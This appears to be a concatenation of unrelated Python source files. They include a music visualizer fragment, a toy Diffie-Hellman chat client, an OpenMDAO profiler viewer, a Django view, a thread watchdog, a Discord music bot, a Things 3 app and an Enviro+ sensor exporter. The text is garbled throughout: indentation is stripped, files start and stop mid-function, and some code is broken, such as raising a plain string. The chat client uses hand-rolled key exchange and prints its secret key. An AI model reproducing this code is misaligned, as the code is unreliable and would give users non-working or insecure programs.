lastShuffle = newShuffle
if newShuffle == 1:
currentVis = "energy"
elif newShuffle == 2:
currentVis = "spectrum"
else:
currentVis = "scroll"
visualize()
shuffler = threading.Timer(shuffleDuration, shuffleVisualization)
shuffler.daemon = True
shuffler.start()
def startShuffleVisualization():
stopShuffle()
global animation
global shufflingV
shufflingV = True
animation = visualize
shuffleVisualization()
def visualize():
global currentVis
global animation
global wasShufflingV
if(not microphone.running):
animation = juggle
if wasShufflingV:
wasShufflingV = False
startShuffleVisualization()
return
if currentVis == "scroll":
scrollMusic()
elif currentVis == "spectrum":
spectrumMusic()
else:
energyMusic()
def energyMusic():
global animation
global isRunning
if animation != visualize:
MESSAGE = "visualize"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
isRunning = False
animation = visualize
visualization.visualization_effect = visualization.visualize_energy
if not isRunning:
        isRunning = True
print('now running')
t = threading.Thread(target=microphone.start_stream, args=[visualization.microphone_update])
t.daemon = True
t.start()
def scrollMusic():
global animation
global isRunning
if animation != visualize:
MESSAGE = "visualize"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
isRunning = False
animation = visualize
visualization.visualization_effect = visualization.visualize_scroll
if not isRunning:
        isRunning = True
print('now running')
t = threading.Thread(target=microphone.start_stream, args=[visualization.microphone_update])
t.daemon = True
t.start()
def spectrumMusic():
global animation
global isRunning
if animation != visualize:
isRunning = False
MESSAGE = "visualize"
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
animation = visualize
visualization.visualization_effect = visualization.visualize_spectrum
if not isRunning:
        isRunning = True
print('now running')
t = threading.Thread(target=microphone.start_stream, args=[visualization.microphone_update])
t.daemon = True
t.start()
################################ COLOR ANIMATIONS #########################################
def staticRGB(r, g, b):
print('animation color')
print(r,g,b)
global animation
global currentColor
currentColor["r"] = r
currentColor["g"] = g
currentColor["b"] = b
if animation == visualize:
stop()
animation = setColor
MESSAGE = 'static {} {} {}'.format(r, g, b)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.sendto(bytes(MESSAGE, "utf-8"), (UDP_IP, UDP_PORT))
def setColor():
global currentColor
staticRGB(currentColor["r"], currentColor["g"], currentColor["b"])
################################ ANIMATION GLOBAL #########################################
animation = juggle
|
client.py
|
import socket
import sys
import json
import threading
import random
import base64
from simplecrypt import encrypt, decrypt
from config import SERVER_ADDRESS, BUFSIZE, MODULUS, BASE
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect(SERVER_ADDRESS)
secret_key = random.randint(1, MODULUS)
public_key = (BASE ** secret_key) % MODULUS
e2e_key = None
def calculate_e2ekey(pubkey):
global e2e_key
e2e_key = (pubkey ** secret_key) % MODULUS
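# Note: this mirrors a textbook Diffie-Hellman exchange. Each side publishes
# (BASE ** secret) % MODULUS and computes (peer_public ** secret) % MODULUS,
# which both sides agree on; the shared value is then used (as a string) as
# the simplecrypt passphrase for the end-to-end encrypted messages.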
def send_message(text):
sock.send(bytes(json.dumps({'type': 'message', 'text': text}), 'utf8'))
def handle_read():
while True:
data = sock.recv(BUFSIZE).decode('utf8')
data = json.loads(data)
if data.get('type') == 'init':
            # the chat peer's public key
pubkey = data.get('pubkey')
calculate_e2ekey(pubkey)
print('system\t>>\tReady! (e2e key={})'.format(e2e_key))
if data.get('type') == 'system':
print('system\t>>\t{}'.format(data['text']))
        # only display messages from the chat peer or the system
if data.get('type') == 'message' and data.get('name') != sys.argv[1]:
decoded = base64.b64decode(data['text'])
text = decrypt(str(e2e_key), decoded)
print('{}\t>>\t{}'.format(data['name'], text.decode('utf8')))
if __name__ == '__main__':
print('\nsecret_key={}'.format(secret_key))
print('public_key={}\n\n'.format(public_key))
try:
# send init message first
sock.send(
bytes(json.dumps({'type': 'init', 'name': sys.argv[1], 'pubkey': public_key}), 'utf8'))
        thread = threading.Thread(target=handle_read)
        thread.start()
while True:
msg = input()
if msg == 'quit':
send_message('quit')
break
else:
chipertext = encrypt(str(e2e_key), msg)
send_message(base64.b64encode(chipertext).decode('utf8'))
finally:
sock.close()
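# Example invocation (assuming a matching chat server is listening at
# config.SERVER_ADDRESS):
#
#   python client.py alice
#
# The first positional argument is used as the chat display name sent in the
# init message.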
|
iprofile_app.py
|
import os
import sys
import time
import webbrowser
import threading
import json
try:
import tornado
import tornado.ioloop
import tornado.web
except ImportError:
tornado = None
from collections import defaultdict, deque
from itertools import groupby
from openmdao.devtools.iprofile import _process_profile, _iprof_py_file
from openmdao.devtools.iprof_utils import func_group, _setup_func_group
from openmdao.utils.mpi import MPI
def _launch_browser(port):
"""
Open the default web browser to localhost:<port>
"""
time.sleep(1)
webbrowser.get().open('http://localhost:%s' % port)
def _startThread(fn):
"""
Start a daemon thread running the given function.
"""
thread = threading.Thread(target=fn)
    thread.daemon = True
thread.start()
return thread
def _parent_key(d):
"""
Return the function path of the parent of function specified by 'id' in the given dict.
"""
parts = d['id'].rsplit('|', 1)
if len(parts) == 1:
return ''
return parts[0]
def _stratify(call_data, sortby='time'):
"""
Group node data by depth and sort within a depth by parent and 'sortby'.
"""
depth_groups = []
node_list = [] # all nodes in a single list
depthfunc=lambda d: d['depth']
for key, group in groupby(sorted(call_data.values(), key=depthfunc), key=depthfunc):
# now further group each group by parent, then sort those in descending order
# by 'sortby'
depth_groups.append({
key: sorted(sub, key=lambda d: d[sortby], reverse=True)
for key, sub in groupby(sorted(group, key=_parent_key), key=_parent_key)
})
max_depth = len(depth_groups)
delta_y = 1.0 / max_depth
y = 0
max_x = call_data['$total'][sortby]
for depth, pardict in enumerate(depth_groups):
y0 = delta_y * depth
y1 = y0 + delta_y
for parent, children in pardict.items():
if not parent:
end_x = 0
else:
end_x = call_data[parent]['x0'] * max_x
for i, node in enumerate(children):
start_x = end_x
end_x += node[sortby]
node['x0'] = start_x / max_x
node['x1'] = end_x / max_x
node['y0'] = y0
node['y1'] = y1
node['idx'] = len(node_list)
node_list.append(node)
return depth_groups, node_list
def _iprof_setup_parser(parser):
if not func_group:
_setup_func_group()
parser.add_argument('-p', '--port', action='store', dest='port',
default=8009, type=int,
help='port used for web server')
parser.add_argument('--no_browser', action='store_true', dest='noshow',
help="Don't pop up a browser to view the data.")
parser.add_argument('-t', '--title', action='store', dest='title',
default='Profile of Method Calls by Instance',
help='Title to be displayed above profiling view.')
parser.add_argument('-g', '--group', action='store', dest='methods',
default='openmdao',
help='Determines which group of methods will be tracked. Current '
'options are: %s and "openmdao" is the default' %
sorted(func_group.keys()))
parser.add_argument('-m', '--maxcalls', action='store', dest='maxcalls',
default=15000, type=int,
help='Maximum number of calls displayed at one time. Default=15000.')
parser.add_argument('file', metavar='file', nargs='+',
help='Raw profile data files or a python file.')
if tornado is None:
def _iprof_exec(options, user_args):
"""
Called from a command line to instance based profile data in a web page.
"""
raise RuntimeError("The 'iprof' function requires the 'tornado' package. "
"You can install it using 'pip install tornado'.")
else:
class _Application(tornado.web.Application):
def __init__(self, options):
self.call_data, _ = _process_profile(options.file)
self.depth_groups, self.node_list = _stratify(self.call_data)
self.options = options
# assemble our call_data nodes into a tree structure, where each
# entry contains that node's call data and a dict containing each
# child keyed by call path.
self.call_tree = tree = defaultdict(lambda: [None, {}])
for path, data in self.call_data.items():
data['id'] = path
parts = path.rsplit('|', 1)
# add our node to our parent
if len(parts) > 1:
tree[parts[0]][1][path] = data
tree[path][0] = data
handlers = [
(r"/", _Index),
(r"/func/([0-9]+)", _Function),
]
settings = dict(
template_path=os.path.join(os.path.dirname(__file__), "templates"),
static_path=os.path.join(os.path.dirname(__file__), "static"),
)
super().__init__(handlers, **settings)
def get_nodes(self, idx):
"""
Yield all children of the given root up to a maximum number stored in options.maxcalls.
"""
if idx == 0:
root = self.call_tree['$total']
else:
root = self.node_list[idx]
root = self.call_tree[root['id']]
maxcalls = self.options.maxcalls
stack = deque()
stack.appendleft(root)
callcount = 1
stop_adding = False
while stack:
parent, children = stack.pop()
yield parent
if not stop_adding:
callcount += len(children)
if callcount <= maxcalls:
for child in children.values():
stack.appendleft(self.call_tree[child['id']])
else:
stop_adding = True
class _Index(tornado.web.RequestHandler):
def get(self):
"""
Load the page template and request call data nodes starting at idx=0.
"""
app = self.application
self.render("iprofview.html", title=app.options.title)
class _Function(tornado.web.RequestHandler):
def get(self, idx):
"""
Request an updated list of call data nodes, rooted at the node specified by idx.
"""
app = self.application
dump = json.dumps(list(app.get_nodes(int(idx))))
self.set_header('Content-Type', 'application/json')
self.write(dump)
def _iprof_exec(options, user_args):
"""
Called from a command line to instance based profile data in a web page.
"""
if options.file[0].endswith('.py'):
if len(options.file) > 1:
print("iprofview can only process a single python file.", file=sys.stderr)
sys.exit(-1)
_iprof_py_file(options, user_args)
if MPI:
options.file = ['iprof.%d' % i for i in range(MPI.COMM_WORLD.size)]
else:
options.file = ['iprof.0']
if not options.noshow and (not MPI or MPI.COMM_WORLD.rank == 0):
app = _Application(options)
app.listen(options.port)
print("starting server on port %d" % options.port)
serve_thread = _startThread(tornado.ioloop.IOLoop.current().start)
launch_thread = _startThread(lambda: _launch_browser(options.port))
while serve_thread.is_alive():
serve_thread.join(timeout=1)
|
views.py
|
from django.shortcuts import render
from django.contrib import messages
import threading
from .Functions import gan_generate
from .Functions.rnn_generate import RNN_generator
from .forms import *
def index(request):
"""
A start view
"""
form = TaskForm()
context = {'form': form}
return render(request, 'index.html', context)
def generate(request):
"""
    A view which runs a background process to generate text using the selected model
"""
form = TaskForm()
context = {'form': form}
if request.method == 'POST':
form = TaskForm(request.POST)
if form.is_valid():
tmp = form.cleaned_data['select_model']
if tmp == 'rnn':
t = threading.Thread(target=generate_using_rnn, args=[request, form.cleaned_data['first_word']])
                t.daemon = True
t.start()
t.join()
elif tmp == 'gan':
t = threading.Thread(target=generate_using_gan, args=[request])
                t.daemon = True
t.start()
t.join()
context = {'form': form, 'select_model': tmp, 'first_word': form.cleaned_data['first_word']}
return render(request, 'index.html', context)
def generate_using_rnn(request, first_word):
"""
    Method which runs the RNN generating algorithm
"""
rnn = RNN_generator(first_word)
result = rnn.run()
messages.info(request, result)
def generate_using_gan(request):
"""
    Method which runs the GAN generating algorithm
"""
result = gan_generate.run()
messages.info(request, result)
|
watchdog.py
|
# coding=utf8
# Watch background processes/threads
import threading
from time import sleep
from lib._logging import logger
class Watchdog():
def __init__(self,interval=30):
'''
Initialize Watchdog
Keyword Arguments:
interval {number} -- time to sleep between checking watchlist (default: {30})
'''
        logger.debug('Watchdog.__init__() called...')
        self.interval = interval
        self.watchlist = []
        logger.info('Watchdog initialized')
def addThread(self, thread):
        logger.debug('Watchdog.addThread(' + str(thread.name) + ') called...')
        if thread in self.watchlist:
            logger.warning(str(thread.name) + ' is already in watchlist.')
        else:
            self.watchlist.append(thread)
            logger.info('Thread added to watchlist: ' + str(thread.name))
def stop(self):
'''
stop Watchdog loop thread
'''
logger.debug('Watchdog.stop() called...')
logger.info('Stopping Watchdog thread')
self.looping = False
self.status = "stopped"
def start(self):
'''
start Watchdog loop thread
'''
logger.info('Starting Watchdog thread')
logger.debug('Watchdog.start() called...')
self.looping = True
self.thread = threading.Thread(name='watchdog', target=self._loop)
self.thread.daemon = True
self.thread.start()
self.status = "running"
def _loop(self):
'''
Monitor status of application threads
'''
logger.debug( 'Watchdog._loop() started...' )
#keep track of the ip addresses we have already scanned
ip_list = []
while self.looping:
for thread in self.watchlist:
                logger.debug('Checking status of thread: ' + thread.name)
#TODO... Check the status of the thread...
sleep(self.interval)
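# Minimal usage sketch (the thread name and work function are illustrative):
#
#   worker = threading.Thread(name='worker', target=do_work)
#   worker.start()
#   watchdog = Watchdog(interval=10)
#   watchdog.addThread(worker)
#   watchdog.start()   # monitor in a background daemon thread
#   ...
#   watchdog.stop()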
|
__main__.py
|
from discord.ext import commands
import os
from threading import Thread
import time
import re
import lavalink
import discord
class Bot:
def __init__(self, **kwargs):
self.intents = discord.Intents.default()
self.intents.members = True
if "prefix" not in kwargs:
raise "You must provide a prefix"
else:
self.bot = commands.Bot(command_prefix = kwargs["prefix"], intents = self.intents)
self.bot.lavalinkpass = kwargs["lavalinkpass"]
self.bot.lavalinkport = kwargs["lavalinkport"]
def connect(self, token):
def lavarun():
os.system("java -jar Lavalink.jar")
print("Starting processes!")
time.sleep(5)
print("Running Lavalink.")
Thread(target = lavarun).start()
time.sleep(30) # yep i intentionally used a blocking module
# lavalink takes a while to boot up
# so this is to make sure its ready when bot gets ready
self.bot.add_cog(init(self.bot))
print("-------------------------------\nRunning Bot!")
self.bot.run(token)
class init(commands.Cog):
def __init__(self, bot):
self.bot = bot
@commands.Cog.listener()
async def on_ready(self):
print("The bot is ready!")
self.bot.add_cog(Music(self.bot))
url_rx = re.compile(r'https?://(?:www\.)?.+')
class Music(commands.Cog):
def __init__(self, bot):
self.bot = bot
if not hasattr(bot, 'lavalink'):
bot.lavalink = lavalink.Client(bot.user.id)
bot.lavalink.add_node("0.0.0.0", self.bot.lavalinkport, self.bot.lavalinkpass, 'na', 'default-node')
bot.add_listener(bot.lavalink.voice_update_handler, 'on_socket_response')
lavalink.add_event_hook(self.track_hook)
def cog_unload(self):
self.bot.lavalink._event_hooks.clear()
async def cog_before_invoke(self, ctx):
guild_check = ctx.guild is not None
if guild_check:
await self.ensure_voice(ctx)
return guild_check
async def cog_command_error(self, ctx, error):
if isinstance(error, commands.CommandInvokeError):
await ctx.send(error.original)
async def ensure_voice(self, ctx):
player = self.bot.lavalink.player_manager.create(ctx.guild.id, endpoint=str(ctx.guild.region))
should_connect = ctx.command.name in ('play',)
if not ctx.author.voice or not ctx.author.voice.channel:
raise commands.CommandInvokeError('Join a voicechannel first.')
if not player.is_connected:
if not should_connect:
raise commands.CommandInvokeError('Not connected.')
permissions = ctx.author.voice.channel.permissions_for(ctx.me)
if not permissions.connect or not permissions.speak:
raise commands.CommandInvokeError('I need the `CONNECT` and `SPEAK` permissions.')
player.store('channel', ctx.channel.id)
await self.connect_to(ctx.guild.id, str(ctx.author.voice.channel.id))
else:
if int(player.channel_id) != ctx.author.voice.channel.id:
raise commands.CommandInvokeError('You need to be in my voicechannel.')
async def track_hook(self, event):
if isinstance(event, lavalink.events.QueueEndEvent):
guild_id = int(event.player.guild_id)
await self.connect_to(guild_id, None)
async def connect_to(self, guild_id: int, channel_id: str):
ws = self.bot._connection._get_websocket(guild_id)
await ws.voice_state(str(guild_id), channel_id)
@commands.command(aliases=['p'])
async def play(self, ctx, *, query: str):
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
query = query.strip('<>')
if not url_rx.match(query):
query = f'ytsearch:{query}'
results = await player.node.get_tracks(query)
if not results or not results['tracks']:
return await ctx.send('Nothing found!')
embed = discord.Embed(color=discord.Color.blurple())
# Valid loadTypes are:
        # TRACK_LOADED - single video/direct URL
        # PLAYLIST_LOADED - direct URL to playlist
# SEARCH_RESULT - query prefixed with either ytsearch: or scsearch:.
# NO_MATCHES - query yielded no results
# LOAD_FAILED - most likely, the video encountered an exception during loading.
if results['loadType'] == 'PLAYLIST_LOADED':
tracks = results['tracks']
for track in tracks:
player.add(requester=ctx.author.id, track=track)
embed.title = 'Playlist Enqueued!'
embed.description = f'{results["playlistInfo"]["name"]} - {len(tracks)} tracks'
else:
track = results['tracks'][0]
embed.title = 'Track Enqueued'
embed.description = f'[{track["info"]["title"]}]({track["info"]["uri"]})'
track = lavalink.models.AudioTrack(track, ctx.author.id, recommended=True)
player.add(requester=ctx.author.id, track=track)
await ctx.send(embed=embed)
if not player.is_playing:
await player.play()
@commands.command(aliases=['dc'])
async def disconnect(self, ctx):
""" Disconnects the player from the voice channel and clears its queue. """
player = self.bot.lavalink.player_manager.get(ctx.guild.id)
if not player.is_connected:
return await ctx.send('Not connected.')
if not ctx.author.voice or (player.is_connected and ctx.author.voice.channel.id != int(player.channel_id)):
return await ctx.send('You\'re not in my voicechannel!')
player.queue.clear()
await player.stop()
await self.connect_to(ctx.guild.id, None)
await ctx.send('*⃣ | Disconnected.')
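# Example usage (sketch, not part of the original module). Assumptions: a
# Lavalink.jar sits in the working directory, the password/port match its
# application.yml, and the Discord token comes from an environment variable
# rather than being hard-coded.
# if __name__ == "__main__":
#     import os
#     bot = Bot(prefix="!",
#               lavalinkpass=os.environ.get("LAVALINK_PASSWORD", "youshallnotpass"),
#               lavalinkport=2333)
#     bot.connect(os.environ["DISCORD_TOKEN"])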
|
things3_app.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""KanbanView (app) for Things 3."""
from __future__ import print_function
# pylint: disable=duplicate-code
__author__ = "Alexander Willner"
__copyright__ = "Copyright 2020 Alexander Willner"
__credits__ = ["Luc Beaulieu", "Alexander Willner"]
__license__ = "Apache License 2.0"
__version__ = "2.6.3"
__maintainer__ = "Alexander Willner"
__email__ = "alex@willner.ws"
__status__ = "Development"
import sys
import signal
from os import system
from threading import Thread
import webview # type: ignore
import objc # type: ignore # pylint: disable=unused-import # noqa F401
import pkg_resources.py2_warn # type: ignore # pylint: disable=unused-import # noqa F401
import things3.things3_api as things3_api
class Things3App():
"""App wrapper for simple read-only API for Things 3."""
database = None
FILE = "kanban.html"
api = None
api_thread = None
def open_api(self):
"""Delay opening the browser."""
print(f"Using database 2: {self.database}")
self.api.main()
def __init__(self, database=None):
self.database = database
self.api = things3_api.Things3API(database=self.database)
def sigterm_handler(self, _signo, _stack_frame):
"""Make sure the server shuts down."""
print("Sigterm...")
self.api.flask_context.shutdown()
def main(self, appstore=False):
"""Run the app."""
# kill possible zombie processes; can't use psutil in py2app context
system('lsof -nti:' + str(things3_api.Things3API.port) +
' | xargs kill -9')
# Make sure the server shuts down
signal.signal(signal.SIGTERM, self.sigterm_handler)
print(f"Using database 1: {self.database}")
window = webview.create_window(
title='KanbanView',
url=f'http://{things3_api.Things3API.host}:' +
f'{things3_api.Things3API.port}/{self.FILE}',
width=1280, height=650,
min_size=(1280, 650),
frameless=True)
if not appstore:
window.closed += advertise
self.api_thread = Thread(target=self.open_api)
try:
self.api_thread.start()
webview.start() # blocking
self.api.flask_context.shutdown()
self.api_thread.join()
except KeyboardInterrupt:
print("Shutting down...")
self.api.flask_context.shutdown()
self.api_thread.join()
sys.exit(0)
def advertise():
"""Show a hint to buy the app"""
text = "Thank you for using KanbanView! " +\
"If you enjoy using it, please consider buying the app."
title = "KanbanView"
url = "https://kanbanview.app"
system("""osascript -e ' """ +
f"""set dialog to (display dialog "{text}" """ +
"""buttons {"Buy", "Later"} default button 1 """ +
f"""giving up after 10 """ +
f"""with title "{title}" """ +
f"""with icon POSIX file "resources/icon.icns")' """ +
f"""-e 'if the button returned of the result is "Buy" then' """ +
f"""-e 'do shell script "open {url}"' -e 'end if'""")
def main():
"""Main entry point for CLI installation"""
Things3App().main()
if __name__ == "__main__":
main()
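# Example (sketch, added): the app can also be pointed at a copy of the
# Things 3 database for testing, e.g.
#     Things3App(database="/path/to/copy-of-things.sqlite3").main()
# The path above is hypothetical; database=None (the default used by main())
# lets things3_api resolve the live database.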
|
enviroplus_exporter.py
|
#!/usr/bin/env python3
import os
import random
import requests
import time
import logging
import argparse
import subprocess
from threading import Thread
from prometheus_client import start_http_server, Gauge, Histogram
from bme280 import BME280
from enviroplus import gas
from pms5003 import PMS5003, ReadTimeoutError as pmsReadTimeoutError
from influxdb_client import InfluxDBClient, Point
from influxdb_client.client.write_api import SYNCHRONOUS
try:
from smbus2 import SMBus
except ImportError:
from smbus import SMBus
try:
# Transitional fix for breaking change in LTR559
from ltr559 import LTR559
ltr559 = LTR559()
except ImportError:
import ltr559
logging.basicConfig(
format='%(asctime)s.%(msecs)03d %(levelname)-8s %(message)s',
level=logging.INFO,
handlers=[logging.FileHandler("enviroplus_exporter.log"),
logging.StreamHandler()],
datefmt='%Y-%m-%d %H:%M:%S')
logging.info("""enviroplus_exporter.py - Expose readings from the Enviro+ sensor by Pimoroni in Prometheus format
Press Ctrl+C to exit!
""")
DEBUG = os.getenv('DEBUG', 'false') == 'true'
bus = SMBus(1)
bme280 = BME280(i2c_dev=bus)
pms5003 = PMS5003()
TEMPERATURE = Gauge('temperature','Temperature measured (*C)')
PRESSURE = Gauge('pressure','Pressure measured (hPa)')
HUMIDITY = Gauge('humidity','Relative humidity measured (%)')
OXIDISING = Gauge('oxidising','Mostly nitrogen dioxide but could include NO and Hydrogen (Ohms)')
REDUCING = Gauge('reducing', 'Mostly carbon monoxide but could include H2S, Ammonia, Ethanol, Hydrogen, Methane, Propane, Iso-butane (Ohms)')
NH3 = Gauge('NH3', 'mostly Ammonia but could also include Hydrogen, Ethanol, Propane, Iso-butane (Ohms)')
LUX = Gauge('lux', 'current ambient light level (lux)')
PROXIMITY = Gauge('proximity', 'proximity, with larger numbers being closer proximity and vice versa')
PM1 = Gauge('PM1', 'Particulate Matter of diameter less than 1 micron. Measured in micrograms per cubic metre (ug/m3)')
PM25 = Gauge('PM25', 'Particulate Matter of diameter less than 2.5 microns. Measured in micrograms per cubic metre (ug/m3)')
PM10 = Gauge('PM10', 'Particulate Matter of diameter less than 10 microns. Measured in micrograms per cubic metre (ug/m3)')
OXIDISING_HIST = Histogram('oxidising_measurements', 'Histogram of oxidising measurements', buckets=(0, 10000, 15000, 20000, 25000, 30000, 35000, 40000, 45000, 50000, 55000, 60000, 65000, 70000, 75000, 80000, 85000, 90000, 100000))
REDUCING_HIST = Histogram('reducing_measurements', 'Histogram of reducing measurements', buckets=(0, 100000, 200000, 300000, 400000, 500000, 600000, 700000, 800000, 900000, 1000000, 1100000, 1200000, 1300000, 1400000, 1500000))
NH3_HIST = Histogram('nh3_measurements', 'Histogram of nh3 measurements', buckets=(0, 10000, 110000, 210000, 310000, 410000, 510000, 610000, 710000, 810000, 910000, 1010000, 1110000, 1210000, 1310000, 1410000, 1510000, 1610000, 1710000, 1810000, 1910000, 2000000))
PM1_HIST = Histogram('pm1_measurements', 'Histogram of Particulate Matter of diameter less than 1 micron measurements', buckets=(0, 5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100))
PM25_HIST = Histogram('pm25_measurements', 'Histogram of Particulate Matter of diameter less than 2.5 micron measurements', buckets=(0, 5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100))
PM10_HIST = Histogram('pm10_measurements', 'Histogram of Particulate Matter of diameter less than 10 micron measurements', buckets=(0, 5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70, 75, 80, 85, 90, 95, 100))
# Setup InfluxDB
# You can generate an InfluxDB Token from the Tokens Tab in the InfluxDB Cloud UI
INFLUXDB_URL = os.getenv('INFLUXDB_URL', '')
INFLUXDB_TOKEN = os.getenv('INFLUXDB_TOKEN', '')
INFLUXDB_ORG_ID = os.getenv('INFLUXDB_ORG_ID', '')
INFLUXDB_BUCKET = os.getenv('INFLUXDB_BUCKET', '')
INFLUXDB_SENSOR_LOCATION = os.getenv('INFLUXDB_SENSOR_LOCATION', 'Adelaide')
INFLUXDB_TIME_BETWEEN_POSTS = int(os.getenv('INFLUXDB_TIME_BETWEEN_POSTS', '5'))
influxdb_client = InfluxDBClient(url=INFLUXDB_URL, token=INFLUXDB_TOKEN, org=INFLUXDB_ORG_ID)
influxdb_api = influxdb_client.write_api(write_options=SYNCHRONOUS)
# Setup Luftdaten
LUFTDATEN_TIME_BETWEEN_POSTS = int(os.getenv('LUFTDATEN_TIME_BETWEEN_POSTS', '30'))
# Sometimes the sensors can't be read; reset the i2c bus by probing it and waiting briefly
def reset_i2c():
subprocess.run(['i2cdetect', '-y', '1'])
time.sleep(2)
# Get the temperature of the CPU for compensation
def get_cpu_temperature():
with open("/sys/class/thermal/thermal_zone0/temp", "r") as f:
temp = f.read()
temp = int(temp) / 1000.0
return temp
# Keep a short rolling history of CPU temperatures at module level so the
# compensation below smooths over several readings instead of re-seeding the
# history on every call.
cpu_temps = [get_cpu_temperature()] * 5

def get_temperature(factor):
    """Get temperature from the weather sensor"""
    # Tuning factor for compensation. Decrease this number to adjust the
    # temperature down, and increase to adjust up
    global cpu_temps
    raw_temp = bme280.get_temperature()
    if factor:
        cpu_temp = get_cpu_temperature()
        # Smooth out with some averaging to decrease jitter
        cpu_temps = cpu_temps[1:] + [cpu_temp]
        avg_cpu_temp = sum(cpu_temps) / float(len(cpu_temps))
        temperature = raw_temp - ((avg_cpu_temp - raw_temp) / factor)
    else:
        temperature = raw_temp
    TEMPERATURE.set(temperature)  # Set to a given value
def get_pressure():
"""Get pressure from the weather sensor"""
try:
pressure = bme280.get_pressure()
PRESSURE.set(pressure)
except IOError:
logging.error("Could not get pressure readings. Resetting i2c.")
reset_i2c()
def get_humidity():
"""Get humidity from the weather sensor"""
try:
humidity = bme280.get_humidity()
HUMIDITY.set(humidity)
except IOError:
logging.error("Could not get humidity readings. Resetting i2c.")
reset_i2c()
def get_gas():
"""Get all gas readings"""
try:
readings = gas.read_all()
OXIDISING.set(readings.oxidising)
OXIDISING_HIST.observe(readings.oxidising)
REDUCING.set(readings.reducing)
REDUCING_HIST.observe(readings.reducing)
NH3.set(readings.nh3)
NH3_HIST.observe(readings.nh3)
except IOError:
logging.error("Could not get gas readings. Resetting i2c.")
reset_i2c()
def get_light():
"""Get all light readings"""
try:
lux = ltr559.get_lux()
prox = ltr559.get_proximity()
LUX.set(lux)
PROXIMITY.set(prox)
except IOError:
logging.error("Could not get lux and proximity readings. Resetting i2c.")
reset_i2c()
def get_particulates():
"""Get the particulate matter readings"""
try:
pms_data = pms5003.read()
except pmsReadTimeoutError:
logging.warning("Failed to read PMS5003")
except IOError:
logging.error("Could not get particulate matter readings. Resetting i2c.")
reset_i2c()
else:
PM1.set(pms_data.pm_ug_per_m3(1.0))
PM25.set(pms_data.pm_ug_per_m3(2.5))
PM10.set(pms_data.pm_ug_per_m3(10))
PM1_HIST.observe(pms_data.pm_ug_per_m3(1.0))
PM25_HIST.observe(pms_data.pm_ug_per_m3(2.5) - pms_data.pm_ug_per_m3(1.0))
PM10_HIST.observe(pms_data.pm_ug_per_m3(10) - pms_data.pm_ug_per_m3(2.5))
def collect_all_data():
"""Collects all the data currently set"""
sensor_data = {}
sensor_data['temperature'] = TEMPERATURE.collect()[0].samples[0].value
sensor_data['humidity'] = HUMIDITY.collect()[0].samples[0].value
sensor_data['pressure'] = PRESSURE.collect()[0].samples[0].value
sensor_data['oxidising'] = OXIDISING.collect()[0].samples[0].value
sensor_data['reducing'] = REDUCING.collect()[0].samples[0].value
sensor_data['nh3'] = NH3.collect()[0].samples[0].value
sensor_data['lux'] = LUX.collect()[0].samples[0].value
sensor_data['proximity'] = PROXIMITY.collect()[0].samples[0].value
sensor_data['pm1'] = PM1.collect()[0].samples[0].value
sensor_data['pm25'] = PM25.collect()[0].samples[0].value
sensor_data['pm10'] = PM10.collect()[0].samples[0].value
return sensor_data
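# Note (added): collect_all_data() returns a plain dict keyed by metric name,
# e.g. {'temperature': 22.5, 'humidity': 48.1, ...}; both posting threads
# below (InfluxDB and Luftdaten) consume this dict.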
def post_to_influxdb():
"""Post all sensor data to InfluxDB"""
name = 'enviroplus'
tag = ['location', 'adelaide']
while True:
time.sleep(INFLUXDB_TIME_BETWEEN_POSTS)
data_points = []
epoch_time_now = round(time.time())
sensor_data = collect_all_data()
for field_name in sensor_data:
data_points.append(Point('enviroplus').tag('location', INFLUXDB_SENSOR_LOCATION).field(field_name, sensor_data[field_name]))
try:
influxdb_api.write(bucket=INFLUXDB_BUCKET, record=data_points)
if DEBUG:
logging.info('InfluxDB response: OK')
except Exception as exception:
logging.warning('Exception sending to InfluxDB: {}'.format(exception))
def post_to_luftdaten():
"""Post relevant sensor data to luftdaten.info"""
"""Code from: https://github.com/sepulworld/balena-environ-plus"""
LUFTDATEN_SENSOR_UID = 'raspi-' + get_serial_number()
while True:
time.sleep(LUFTDATEN_TIME_BETWEEN_POSTS)
sensor_data = collect_all_data()
values = {}
values["P2"] = sensor_data['pm25']
values["P1"] = sensor_data['pm10']
values["temperature"] = "{:.2f}".format(sensor_data['temperature'])
values["pressure"] = "{:.2f}".format(sensor_data['pressure'] * 100)
values["humidity"] = "{:.2f}".format(sensor_data['humidity'])
pm_values = dict(i for i in values.items() if i[0].startswith('P'))
temperature_values = dict(i for i in values.items() if not i[0].startswith('P'))
try:
response_pin_1 = requests.post('https://api.luftdaten.info/v1/push-sensor-data/',
json={
"software_version": "enviro-plus 0.0.1",
"sensordatavalues": [{"value_type": key, "value": val} for
key, val in pm_values.items()]
},
headers={
"X-PIN": "1",
"X-Sensor": LUFTDATEN_SENSOR_UID,
"Content-Type": "application/json",
"cache-control": "no-cache"
}
)
response_pin_11 = requests.post('https://api.luftdaten.info/v1/push-sensor-data/',
json={
"software_version": "enviro-plus 0.0.1",
"sensordatavalues": [{"value_type": key, "value": val} for
key, val in temperature_values.items()]
},
headers={
"X-PIN": "11",
"X-Sensor": LUFTDATEN_SENSOR_UID,
"Content-Type": "application/json",
"cache-control": "no-cache"
}
)
if response_pin_1.ok and response_pin_11.ok:
if DEBUG:
logging.info('Luftdaten response: OK')
else:
logging.warning('Luftdaten response: Failed')
except Exception as exception:
logging.warning('Exception sending to Luftdaten: {}'.format(exception))
def get_serial_number():
"""Get Raspberry Pi serial number to use as LUFTDATEN_SENSOR_UID"""
with open('/proc/cpuinfo', 'r') as f:
for line in f:
if line[0:6] == 'Serial':
return str(line.split(":")[1].strip())
def str_to_bool(value):
if value.lower() in {'false', 'f', '0', 'no', 'n'}:
return False
